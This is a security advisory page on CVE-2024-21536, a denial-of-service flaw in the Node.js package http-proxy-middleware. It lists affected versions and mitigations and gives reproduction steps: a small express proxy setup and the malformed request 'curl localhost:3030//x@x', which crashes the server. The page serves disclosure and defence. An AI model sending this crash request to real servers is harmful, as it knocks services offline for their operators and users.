By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

PreferencesRejectAccept
Manage Consent Preferences by Category
Essentials
Always active

Necessary for the site to function. Always On.

Used for targeted advertising.

Remembers your preferences and provides enhanced features.

Measures usage and improves your experience.

Reject AllAccept All
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
View all Vulnerabilities

CVE-2024-21536

Denial of Service
Affects
Http Proxy Middleware
<2.0.7, >=3.0.0 <3.0.3
in
Web Essentials
No items found.
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

View NES Solution

Overview

Http Proxy Middleware is a package for Node.js proxying. It allows users to configure proxy middleware for connect, express, browser-sync and more.

A Denial of Service (DoS) vulnerability (CVE-2024-21536) has been identified in the http-proxy-middleware package caused by an UnhandledPromiseRejection error thrown by micromatch. An attacker could kill the Node.js process and crash the server by making requests to certain paths.

Per OWASP: The Denial of Service (DoS) attack is focused on making a resource (site, application, server) unavailable for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may cease to be available to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources it uses.

This issue affects Http Proxy Middleware versions lower than 2.0.7 or greater than or equal to 3.0.0 and lower than 3.0.3.

Details

Module Info

Vulnerability Info

This High-severity vulnerability is found in the http-proxy-middleware package, affecting versions <2.0.7, >=3.0.0 <3.0.3.

On v1 and v2 of http-proxy-middleware, it is possible to cause the server to crash with TypeError: Cannot read properties of null (reading 'indexOf') (from matchSingleStringPath). The crash occurs when an attacker requests a malformed url (like localhost:3030//x@x), such that the url is parsed to null and  matchSingleStringPath tries to call indexOf on something that isn’t actually a string. As soon as the code tries to run indexOf on a null, it throws the TypeError.

Steps To Reproduce

1. Using Node v22, create a new project with the following dependencies

 "devDependencies": {
   "express": "^4.17.1",
   "http-proxy-middleware": "0.19.2"
  }

2. Add an app.ts file and configure it to use http-proxy-middleware:

const express = require('express');
const proxy = require('http-proxy-middleware');

const app = express();
const port = 3030;

// Logging middleware for proxy
app.use((req, res, next) => {
  console.log(`[Proxy] Request received: ${req.method} ${req.originalUrl}`);
  next();
});

app.use(
  '',
  proxy({
    target: 'http://localhost:3031',
    onProxyReq: (proxyReq, req) => {
      console.log(
        `[Proxy] Forwarding request to backend: ${req.method} ${req.url}`
      );
    },
    onProxyRes: (proxyRes, req) => {
      console.log(
        `[Proxy] Received response from backend for: ${req.method} ${req.url}`
      );
    },
    onError: (err, req, res) => {
      console.error(`[Proxy] Error occurred: ${err.message}`);
      res.status(500).send('Proxy encountered an error');
    },
  })
);

app.listen(port, () => {
  console.log(`Example app listening at http://localhost:${port}`);
});

3. Add a backend.js file and configure it to be the destination server:

const express = require('express');

const backend = express();
const port = 3031;

// Logging middleware for backend
backend.use((req, res, next) => {
  console.log(`[Backend] Request received: ${req.method} ${req.originalUrl}`);
  next();
});

backend.get('/', (req, res) => {
  res.send('Backend response: OK');
});

backend.listen(port, () => {
  console.log(`[Backend] listening at http://localhost:${port}`);
});

4. Start the servers: node app.js and node backend.js

5. Execute the malicious curl request: curl localhost:3030//x@x. Note the errors response from the proxy server:

TypeError: Cannot read properties of null (reading 'indexOf')

Proof Of Concept

A full reproduction with code similar to the above can be found here:

DOS vulnerability POC

Credits

  • Marc Hassan (finder)

Mitigation

Version 0.19.x of http-proxy-middleware has not received a patch for this CVE. For more information see the list of patched versions here.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications away from the affected versions of http-proxy-middleware.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Pink arrow
Pink arrow
CVE-2024-29180
CVE-2024-21536
CVE-2024-29415
What is a HeroDevs Security Advisory?
Vulnerability Details
ID
CVE-2024-21536
PROJECT Affected
Http Proxy Middleware
Versions Affected
<2.0.7, >=3.0.0 <3.0.3
Published date
January 27, 2025
≈ Fix date
January 27, 2025
Fixed in
Web Essentials NES
Severity
High
Category
Denial of Service
Sign up for the latest vulnerability alerts fixed in
Web Essentials NES
Rss feed icon
Subscribe via RSS
or
Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.